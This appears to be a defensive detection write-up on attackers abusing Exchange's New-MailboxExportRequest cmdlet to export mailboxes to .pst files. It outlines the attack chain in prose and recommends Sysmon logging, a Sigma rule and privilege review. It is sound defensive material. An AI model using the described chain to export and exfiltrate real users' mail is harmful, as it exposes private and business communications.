Exchange Mailbox Export via PowerShell

Attackers may target user email to collect sensitive information. The New-MailBoxExportRequest cmdlet is used to export the contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange. Attackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data. This activity is typically performed using PowerShell or similar scripting tools and can be difficult to detect without specific monitoring in place. The activity may be part of a larger attack campaign targeting sensitive information.

Attack Chain

1. An attacker gains initial access to a compromised system with sufficient privileges to access Exchange PowerShell.
2. The attacker authenticates to the Exchange server using PowerShell.
3. The attacker uses the New-MailboxExportRequest cmdlet to initiate the export of a target mailbox to a .pst file. The command may include parameters to filter specific content.
4. The Exchange server processes the export request, creating a .pst file containing the mailbox data.
5. The attacker retrieves the exported .pst file from the designated file path.
6. The attacker may compress and archive the .pst file to reduce its size for exfiltration.
7. The attacker exfiltrates the .pst file to an external location controlled by the attacker.
8. The attacker analyzes the .pst file to extract sensitive information such as credentials, financial data, or intellectual property.

Impact

Successful exploitation allows the attacker to gain access to sensitive information contained within the exported mailboxes. This could lead to financial loss, reputational damage, or compromise of intellectual property. Depending on the scope of the export requests, multiple mailboxes may be compromised, impacting a large number of users. The impact is significant because email often contains highly sensitive business communications and data.

Recommendation

• Enable Sysmon process creation logging to monitor PowerShell execution with command-line arguments (Data Source: Sysmon).
• Implement the provided Sigma rule to detect the use of New-MailboxExportRequest cmdlet in PowerShell commands.
• Review the privileges of users with the “Mailbox Import Export” privilege to ensure that the least privilege principle is being followed.
• Monitor Windows Security Event Logs for PowerShell activity related to mailbox export requests (Data Source: Windows Security Event Logs).
• Investigate any alerts generated by the Sigma rules to identify potential malicious activity.